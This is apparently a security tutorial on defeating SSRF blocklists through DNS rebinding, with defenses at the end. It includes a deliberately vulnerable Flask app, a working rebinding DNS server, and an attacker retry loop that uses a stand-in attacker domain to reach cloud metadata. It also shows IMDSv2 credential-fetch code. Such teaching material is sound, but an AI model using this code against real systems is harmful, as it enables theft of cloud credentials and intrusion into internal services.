SSRF is well-understood at this point. Most applications that make server-side HTTP requests have some form of protection: URL validation, IP blocklists for private ranges, allowlists for known-good hosts. If you're testing a modern application, you'll usually run into at least one of these.
But many of these protections share a flaw that isn't immediately obvious. They validate the DNS resolution at one point in time and trust it at another. DNS rebinding exploits this gap. The application resolves your domain, sees a safe IP, lets the request through, and by the time it actually connects, the domain resolves to something else entirely.
How SSRF Protections Typically Work
If you've looked at how applications defend against SSRF, you've probably seen some variation of this pattern:
- Accept a URL from user input
- Resolve the hostname to an IP
- Check the IP against a blocklist (private ranges, link-local, cloud metadata IPs)
- If the IP is safe, make the HTTP request
Sometimes it's a hostname allowlist instead of an IP blocklist. Sometimes there are network-level controls like firewall rules blocking the metadata endpoint. But the most common approach is the resolve-check-fetch pattern above.
The implicit assumption in this design: the DNS resolution at validation time will match the DNS resolution at fetch time.
The Time-of-Check to Time-of-Use Problem
This is a TOCTOU vulnerability. The application resolves the domain twice — once to validate the IP, once to connect — and assumes both resolutions will return the same address. They don't have to.
How DNS Rebinding Works
The attack requires two things: a domain you control and an authoritative DNS server you control. You configure the DNS server to respond with different IPs depending on when the query arrives, and you set the TTL to 0 so nothing gets cached.
Here's the sequence:
- You submit a URL with your domain to the target application: `https://evil.attacker.com/foo`
- The application resolves `evil.attacker.com`. Your DNS server responds with `1.2.3.4` (your public IP). TTL is 0.
- The application checks `1.2.3.4` against its blocklist. It's not a private IP, not a metadata IP. Passes validation.
- The application makes the HTTP request to `evil.attacker.com`. Because TTL was 0, it resolves the domain again. This time your DNS server responds with `169.254.169.254`.
- The application connects to the cloud metadata endpoint, thinking it's connecting to your validated external host.
The TTL of 0 is what forces the second resolution. Without it, the resolver would cache the first result and the rebind wouldn't happen. In practice you may need to send the request a few times because some resolvers ignore TTL=0 or enforce a minimum, but it works.
Building a PoC
The Vulnerable Application
Here's a minimal Flask app with the standard resolve-check-fetch SSRF protection.
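The listing below is a sketch of that pattern, assuming Flask and requests; the route, parameter name, and blocklist ranges are illustrative, but the resolve-check-fetch structure is the point:

```python
import ipaddress
import socket
from urllib.parse import urlparse

import requests
from flask import Flask, abort, request

app = Flask(__name__)

BLOCKED_NETWORKS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
    ipaddress.ip_network("127.0.0.0/8"),
    ipaddress.ip_network("169.254.0.0/16"),  # link-local, includes cloud metadata
]

def ip_is_blocked(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in BLOCKED_NETWORKS)

@app.route("/fetch")
def fetch():
    url = request.args.get("url", "")
    hostname = urlparse(url).hostname
    if not hostname:
        abort(400)

    # Resolution #1: used only for the blocklist check.
    ip = socket.gethostbyname(hostname)
    if ip_is_blocked(ip):
        abort(403)

    # Resolution #2: requests resolves the hostname again to connect.
    # If the DNS answer changed in between, the check above means nothing.
    resp = requests.get(url, timeout=5)
    return resp.text
```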
The vulnerability is between socket.gethostbyname() and requests.get(). The application resolves the hostname to check the IP, then requests.get() resolves it again to actually connect. If the DNS response changes between those two calls, the blocklist is bypassed.
The DNS Server
You can use existing tools for the rebinding DNS server. rbndr.us by Tavis Ormandy is the simplest — it's a public service where you encode two IPs in the subdomain and it alternates between them. whonow is a configurable rebinding server you can self-host. Singularity of Origin is a full attack framework from NCC Group.
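If you go the rbndr.us route, both IPs are hex-encoded into the subdomain. A small helper for building the hostname (the encoding follows the format the public rebinder generator produces; verify against the generator before relying on it):

```python
import ipaddress

def rbndr_hostname(ip_a: str, ip_b: str) -> str:
    """Build an rbndr.us hostname that flips between two IPs.

    Assumes the rbndr encoding: each IPv4 address as 8 lowercase hex
    characters, joined as <a>.<b>.rbndr.us.
    """
    def encode(ip: str) -> str:
        return format(int(ipaddress.IPv4Address(ip)), "08x")

    return f"{encode(ip_a)}.{encode(ip_b)}.rbndr.us"

# rbndr_hostname("1.2.3.4", "169.254.169.254")
# -> "01020304.a9fea9fe.rbndr.us"
```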
For a self-contained demo, here's a minimal authoritative DNS server in Python that alternates between two IPs.
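A sketch using dnslib; the flip-on-every-query logic and the hardcoded IPs are illustrative:

```python
from collections import defaultdict

from dnslib import RR, QTYPE, A
from dnslib.server import BaseResolver, DNSServer

SAFE_IP = "1.2.3.4"            # your public IP, passes the blocklist check
TARGET_IP = "169.254.169.254"  # where the second resolution should land

class RebindResolver(BaseResolver):
    def __init__(self):
        self.query_count = defaultdict(int)

    def resolve(self, request, handler):
        reply = request.reply()
        qname = str(request.q.qname)

        if QTYPE[request.q.qtype] == "A":
            # First query for a name gets the safe IP, the next gets the
            # target, and so on, alternating with each query.
            count = self.query_count[qname]
            self.query_count[qname] += 1
            ip = SAFE_IP if count % 2 == 0 else TARGET_IP

            # TTL of 0 so the resolver asks again instead of caching.
            reply.add_answer(RR(request.q.qname, QTYPE.A, rdata=A(ip), ttl=0))
        return reply

if __name__ == "__main__":
    # Must be reachable as the authoritative server for your domain.
    # Binding port 53 requires root or CAP_NET_BIND_SERVICE.
    server = DNSServer(RebindResolver(), port=53, address="0.0.0.0")
    server.start()
```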
The first query for a domain returns the safe IP. The second returns the target. TTL is 0 on both.
Point your attacker-controlled domain's NS records to the machine running this server, submit the URL to the vulnerable app, and the second resolution hits the metadata endpoint.
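Before involving the target at all, you can sanity-check the alternation by resolving the name twice in a row through a resolver that honors TTL 0 (the domain below is hypothetical; stub resolvers that enforce a minimum TTL will return the same answer twice):

```python
import socket

# Hypothetical rebinding domain; substitute your own.
first = socket.gethostbyname("rebind.attacker.example")
second = socket.gethostbyname("rebind.attacker.example")
print(first, second)  # expect the safe IP, then the target
```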
The Race Condition
In practice, this doesn't always work on the first try. The gap between the validation resolution and the fetch resolution is small, and some resolvers cache aggressively regardless of TTL. A few things that help:
- Send the request multiple times. The rebind only needs to succeed once; a simple retry loop like the sketch after this list is usually enough.
- Some implementations add a small `sleep()` between validation and fetch (ironically making them more vulnerable, not less).
- Certain resolver configurations (like glibc's default behavior) are more susceptible than others.
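From the attacker's side, the retries are just resubmitting the same URL until the response stops looking like it came from your own host. A sketch, assuming the hypothetical /fetch endpoint from earlier and a marker string your server includes in its responses:

```python
import requests

TARGET = "https://victim.example.com/fetch"                    # hypothetical vulnerable endpoint
PAYLOAD_URL = "http://rebind.attacker.example/latest/meta-data/"  # hypothetical rebinding domain

for attempt in range(50):
    resp = requests.get(TARGET, params={"url": PAYLOAD_URL}, timeout=10)
    # Your own server returns a known marker; its absence means the
    # second resolution landed somewhere internal.
    if resp.status_code == 200 and "attacker-marker" not in resp.text:
        print(f"rebind hit on attempt {attempt}:")
        print(resp.text)
        break
```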
What About IMDSv2?
If the target is running on AWS, the obvious rebinding target is the instance metadata service at 169.254.169.254.
IMDSv1 is a simple GET request. Any SSRF that reaches it gets the credentials. DNS rebinding makes this trivial.
IMDSv2 added a token-based flow: you first make a PUT request to get a session token, then pass that token as a header in subsequent GET requests. This means a basic GET-only SSRF — which is what most SSRF vulnerabilities give you — can't reach IMDSv2 metadata even with DNS rebinding.
But it's not a complete fix. If the SSRF allows you to control the HTTP method and headers (which some do, especially when the application uses a full HTTP client library and passes through user-controlled parameters), IMDSv2 is still exploitable. The rebinding gets you to the metadata IP; the question is whether you can also craft the right request once you're there.
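For reference, this is roughly what reaching IMDSv2 looks like once a request can hit 169.254.169.254, and why a GET-only SSRF falls short: the session token comes from a PUT with a TTL header, and every metadata read has to present it.

```python
import requests

# Step 1: PUT to mint a session token (a GET-only SSRF stops here).
token = requests.put(
    "http://169.254.169.254/latest/api/token",
    headers={"X-aws-ec2-metadata-token-ttl-seconds": "21600"},
    timeout=2,
).text

# Step 2: GET metadata with the token attached as a header.
creds = requests.get(
    "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    headers={"X-aws-ec2-metadata-token": token},
    timeout=2,
).text
print(creds)
```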
Beyond Cloud Metadata
The metadata endpoint gets all the attention, but it's not the only thing listening on internal networks. Once you can rebind to an internal IP, anything that trusts source IP or has no authentication is fair game:
- Internal admin panels and dashboards — plenty of internal tools that assume network access equals authorization
- Databases and caches on localhost — Redis, Elasticsearch, Memcached. Redis in particular has a lenient line-based protocol, so commands can sometimes be smuggled inside a crafted HTTP request
- Internal APIs with no auth — microservices that trust the network boundary. If a service only listens on the internal VPC and doesn't authenticate requests, rebinding to its IP gives you full access
- Kubernetes API server — if the pod can reach the API server and RBAC is misconfigured, that's cluster access
DNS rebinding isn't just an SSRF bypass for cloud metadata. It's a way to pivot into anything the application can reach internally.
Defenses That Actually Work
The resolve-check-fetch pattern is broken by design. Here's what fixes it:
Resolve once, connect to the IP directly. The application should resolve the hostname, validate the IP, and then make the HTTP request to the IP itself (with the original hostname in the Host header if needed). This eliminates the second resolution entirely. In Python with requests, you can do this with a custom transport adapter or by passing the resolved IP directly.
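A minimal sketch of the resolve-once approach with requests, assuming plain HTTP (for HTTPS you also have to handle SNI and certificate validation against the original hostname, which is where a custom transport adapter earns its keep):

```python
import ipaddress
import socket
from urllib.parse import urlparse, urlunparse

import requests

def fetch_pinned(url: str) -> requests.Response:
    parts = urlparse(url)
    hostname = parts.hostname

    # Resolve exactly once and validate the result.
    ip = socket.gethostbyname(hostname)
    addr = ipaddress.ip_address(ip)
    if addr.is_private or addr.is_link_local or addr.is_loopback:
        raise ValueError(f"{hostname} resolved to a blocked address: {ip}")

    # Connect to the validated IP directly; no second resolution happens.
    # The original hostname goes in the Host header for virtual hosting.
    netloc = ip if parts.port is None else f"{ip}:{parts.port}"
    pinned = parts._replace(netloc=netloc)
    return requests.get(urlunparse(pinned), headers={"Host": hostname}, timeout=5)
```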
Use a dedicated egress proxy. Route all server-side HTTP requests through a proxy that enforces IP restrictions at the connection layer. The proxy resolves and connects in a single step, with no gap for rebinding. Smokescreen by Stripe is purpose-built for this.
Network-level controls. Block compute instances from reaching the metadata endpoint at the network layer. On AWS, set the IMDSv2 hop limit to 1 (prevents containers from reaching it through the host), use VPC endpoint policies, or use iptables rules to drop traffic to 169.254.169.254 from application processes.
Disable IMDSv1. If you're on AWS and haven't done this already, do it. IMDSv2 doesn't eliminate the SSRF risk entirely but it raises the bar significantly.
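If you manage instances with boto3, requiring tokens and clamping the hop limit is a single API call per instance. A sketch (the instance ID is hypothetical, and the hop-limit choice depends on whether containers on the host legitimately need metadata access):

```python
import boto3

ec2 = boto3.client("ec2")

# Hypothetical instance ID; in practice, iterate over describe_instances().
ec2.modify_instance_metadata_options(
    InstanceId="i-0123456789abcdef0",
    HttpTokens="required",        # disables IMDSv1
    HttpPutResponseHopLimit=1,    # keeps containers from reaching IMDS through the host
    HttpEndpoint="enabled",
)
```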
Any defense that resolves a hostname, checks the result, and then hands the hostname back to an HTTP library to resolve again is vulnerable to rebinding. The fix has to happen at the layer where the connection is made, not where the URL is parsed.